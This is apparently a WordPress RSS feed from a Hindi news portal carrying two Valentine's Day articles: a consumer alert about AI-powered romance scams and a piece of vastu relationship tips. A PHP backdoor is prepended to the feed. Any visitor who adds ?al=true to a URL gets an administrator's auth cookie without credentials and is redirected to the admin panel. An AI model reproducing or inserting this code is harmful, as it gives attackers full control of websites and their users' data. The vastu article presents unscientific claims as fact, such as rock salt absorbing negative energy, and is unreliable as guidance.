// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Valentine Day – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 13 Feb 2026 16:05:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 Valentine’s Day पर AI लव स्कैम का अलर्ट: ‘लैला-मजनू’ बनकर ठग रहे शातिर, सावधान रहें! https://pratyushaashakinayikiran.com/?p=197659 Fri, 13 Feb 2026 16:05:00 +0000 https://pratyushaashakinayikiran.com/?p=197659 नई दिल्ली
वैलेंटाइन डे (Valentine's Day) के नजदीक आते ही जहां चारों तरफ प्यार की चर्चा है वहीं साइबर अपराधी भी हनी ट्रैप का जाल बिछाकर सक्रिय हो गए हैं। इस साल सबसे बड़ी चुनौती AI (आर्टिफिशियल इंटेलिजेंस) बनकर उभरी है। एक्सपर्ट्स का दावा है कि स्कैमर्स अब AI की मदद से इतने असली दिखने वाले प्रोफाइल बना रहे हैं कि एक आम यूजर के लिए धोखे को पहचानना लगभग नामुमकिन हो गया है।

AI के जरिए कैसे बुना जा रहा है इश्क का जाल?
अब स्कैमर्स केवल फोटो ही नहीं बल्कि आपकी भावनाओं से खेलने के लिए एडवांस्ड तकनीक का इस्तेमाल कर रहे हैं:

नेचुरल चैटिंग: टेक्स्ट-जनरेशन टूल्स (जैसे ChatGPT) का उपयोग कर स्कैमर्स आपकी भाषा और पसंद-नापसंद के हिसाब से बिल्कुल इंसानी लहजे में बात करते हैं।

वॉइस क्लोनिंग: स्कैमर्स सिर्फ एक छोटे ऑडियो सैंपल से किसी की भी आवाज कॉपी कर लेते हैं। आपको लगेगा कि आप अपने पार्टनर से फोन पर बात कर रहे हैं लेकिन वह एक मशीन होगी।

डीपफेक वीडियो: वीडियो कॉल पर भी अब भरोसा करना मुश्किल है। डीपफेक के जरिए स्कैमर्स किसी और का चेहरा लगाकर आपसे बात कर सकते हैं।

स्कैम पहचानने के Red Flags
साइबर सिक्योरिटी एक्सपर्ट्स के अनुसार रोमांस स्कैम में अक्सर ये पैटर्न देखे जाते हैं। इनकी तस्वीरें किसी मॉडल जैसी दिखेंगी और प्रोफाइल एकदम परफेक्ट लगेगा। ये लोग बहुत जल्दी इमोशनल बातें शुरू कर देते हैं और शादी या गहरे रिश्ते के सपने दिखाने लगते हैं। जब भी आप आमने-सामने मिलने की बात करेंगे ये कोई न कोई बहाना (जैसे- दूसरे शहर में नौकरी या विदेश यात्रा) बनाकर टाल देंगे। अंत में बात हमेशा किसी इमरजेंसी, बीमारी या शानदार इन्वेस्टमेंट स्कीम पर आकर रुकेगी।

वर्चुअल प्यार के इस दौर में इन तरीकों से अपनी सुरक्षा करें:
वीडियो कॉल पर हेड टेस्ट:
अगर आपको वीडियो कॉल पर शक हो, तो सामने वाले को अपना सिर चारों तरफ घुमाने या चेहरे के आगे हाथ हिलाने को कहें। अगर वह डीपफेक होगा, तो वीडियो के पिक्सल फट जाएंगे या चेहरा अजीब दिखने लगेगा।

निजी जानकारी न दें: अपनी बैंक डिटेल्स, ओटीपी या प्राइवेट फोटोज किसी अजनबी के साथ शेयर न करें।

पैसे भेजने से बचें: चाहे कितनी भी बड़ी इमरजेंसी बताई जाए जिस व्यक्ति से आप कभी मिले नहीं हैं उसे एक रुपया भी न भेजें।

रिवर्स इमेज सर्च: पार्टनर की फोटो को गूगल पर 'रिवर्स इमेज सर्च' करके देखें कि कहीं वह फोटो इंटरनेट से चुराई गई तो नहीं है।

 

]]>
वैलेंटाइन डे 2026: रिश्तों में चल रहा तनाव होगा खत्म, वास्तु के इन 3 उपायों से पार्टनर आएंगे फिर करीब https://pratyushaashakinayikiran.com/?p=197558 Fri, 13 Feb 2026 10:00:00 +0000 https://pratyushaashakinayikiran.com/?p=197558 वैलेंटाइन डे सिर्फ तोहफों और कैंडल लाइट डिनर का दिन नहीं है, बल्कि यह अपने रिश्तों की गहराई को समझने और उनमें आई दूरियों को मिटाने का भी एक सुनहरा मौका है। कई बार हम अपने पार्टनर को खुश करने की लाख कोशिशें करते हैं, लेकिन घर का वास्तु हमारे रिश्तों में अनजाने में तनाव पैदा कर देता है।

वास्तु शास्त्र के अनुसार, घर की दिशाएं और वहां रखी चीजें हमारे मन और भावनाओं पर गहरा असर डालती हैं। साल 2026 के वैलेंटाइन डे पर अगर आप भी अपने रिश्ते में वही पुरानी वाली मिठास वापस चाहते हैं, तो घर के एक खास कोने में बदलाव करना आपके लिए जादू की तरह काम कर सकता है।

दक्षिण-पश्चिम दिशा

वास्तु विज्ञान में दक्षिण-पश्चिम दिशा को 'पितृ' और 'रिश्तों' का कोना माना जाता है। अगर आपके और आपके पार्टनर के बीच छोटी-छोटी बातों पर झगड़े होते हैं, तो सबसे पहले इसी कोने की जांच करें।

क्या करें बदलाव?

साफ-सफाई: इस वैलेंटाइन, घर के इस कोने से कबाड़, टूटी हुई चीजें या नीले रंग की वस्तुओं को तुरंत हटा दें। नीला रंग पानी का प्रतीक है, जो इस दिशा की स्थिरता को डगमगा देता है।

लव बर्ड्स या जोड़े की तस्वीर: इस दिशा में हंसों के जोड़े की मूर्ति या अपनी और अपने पार्टनर की एक मुस्कुराती हुई फोटो लगाएं। ध्यान रहे कि फोटो लाल या सुनहरे फ्रेम में हो।

गुलाबी रोशनी: वैलेंटाइन डे की शाम इस कोने में एक छोटा गुलाबी या लाल रंग का लैंप जलाएं। गुलाबी रंग प्यार और करुणा का प्रतीक है।

बेडरूम का वास्तु भी जरूरी

अक्सर बेडरूम में रखी कुछ चीजें नकारात्मकता फैलाती हैं। वास्तु के अनुसार, सोते समय कभी भी आपके पैर मुख्य दरवाजे की ओर नहीं होने चाहिए। साथ ही, बेडरूम में शीशा ऐसी जगह न लगाएं जहां सोते समय आपकी परछाई दिखे, यह वैवाहिक जीवन में तनाव का कारण बनता है।

रिश्ते में प्यार बढ़ाने के लिए इस वैलेंटाइन डे पर अपने बेडरूम में ताजे गुलाब के फूल रखें और थोड़े से 'रॉक साल्ट' (सेंधा नमक) से घर में पोंछा लगाएं। यह नकारात्मक ऊर्जा को सोख लेता है और वातावरण में सकारात्मकता भर देता है।

 

]]>